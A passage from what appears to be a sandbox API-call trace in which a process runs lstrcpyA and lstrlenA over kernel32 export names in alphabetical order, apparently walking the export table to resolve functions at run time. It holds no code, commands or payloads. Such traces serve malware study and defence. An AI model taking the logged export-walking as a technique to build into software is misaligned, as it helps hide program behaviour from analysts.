lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.106] lstrlenA (lpString="COPYFILEA") returned 9 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.106] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.106] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.107] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.107] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.107] lstrlenA (lpString="COPYFILEW") returned 9 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.107] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.107] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.107] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.107] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.107] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.107] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.107] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.107] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.107] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.107] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.107] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.107] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.107] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.107] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.107] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.107] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.107] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.108] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.108] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.108] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.108] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.108] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.108] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.108] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.108] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.108] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.108] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.108] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.108] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.108] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.108] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.108] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.108] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.108] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.108] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.109] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.109] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.109] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.109] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.109] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.109] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.109] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.109] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.109] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.109] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.109] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.109] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.109] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.109] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.109] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.109] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.109] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.109] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.110] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.110] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.110] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.110] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.110] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.110] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.110] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.110] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.110] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.110] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.110] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.110] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.110] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.110] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.110] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.110] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.110] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.110] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.110] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.111] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.111] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.111] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.111] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.111] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.111] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.111] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.111] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.111] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.111] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.111] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.111] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.111] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.111] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.111] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.111] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.111] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.111] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.112] lstrlenA (lpString="DELETEATOM") returned 10 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.112] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.112] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.112] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.112] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.112] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.112] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.112] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.112] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.112] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.112] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.112] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.112] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.112] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.112] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.112] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.112] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.112] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.113] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.113] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.113] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.113] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.113] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.113] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.113] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.113] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.113] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.113] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.113] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.113] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.113] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.113] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.113] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.113] lstrcpyA (in: 